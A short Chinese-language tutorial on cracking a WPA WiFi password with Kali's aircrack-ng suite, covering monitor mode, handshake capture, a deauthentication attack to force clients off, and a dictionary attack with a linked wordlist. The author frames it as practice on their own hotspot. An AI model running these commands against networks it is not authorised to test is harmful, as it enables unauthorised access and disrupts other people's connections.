kali破解wifi密码
开始
1、选择合适的网卡,有些网卡kali识别不了,我用的网卡信息
2、网卡开启监听模式
3、查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功)
4、输入“airodump-ng wlan0mon”,扫描附近热点信息,找到自己想要破解的热点名称后按下ctrl+c停止扫描(NEM-AL10是我自己用手机开启的热点,破解他人无线密码是违法的,自己搭个热点玩玩就行)
5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目录}”输入:airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,当抓到握手包的时候箭头处会显示”handshake“字样
6、可以看到现在抓不到握手包,是因为没有客户端与AP进行连接。但是我们看到了一个已连接的热点,我们发送反认证包,让其下线,然后改客户端会重新尝试连接热点,然后我们就可以抓到握手包了。
新开一个终端窗口,命令格式为:aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址(STATION下面的地址)} 无线网卡名称
输入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系统会下线,然后重新连接,然后我们就可以抓到握手包了。
7、按下ctrl+c停止抓包。进到/home目录下查看握手包,其中"-01.cap"是我们一会儿破解要用到的数据包
8、使用aircrack-ng进行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的关键)} {握手包}
输入"aircrack-ng -w top3000.txt /home/-01.cap",由于握手包命名的特殊性,这里只能使用绝对路径,可以改个名字就可以使用相对路径了
字典网上有好多,这个是github上的:https://github.com/conwnet/wpa-dictionary
结语:
破解的原理还是一个一个试,之所以要抓握手包,是因为握手包中含有经过加密的密码,我们将握手包抓下来后,可以在本地跑字典破解,并且每秒钟可以试几万个密码,但是如果没有握手包,我们只能手动输密码,那样是很慢的,即使可以用程序来跑,也不能保证路由器没有设置错误次数,有可能会禁止连接,即使没有设置错误次数,但是每次与路由器交互的过程所需要耗费的时间也大于一秒。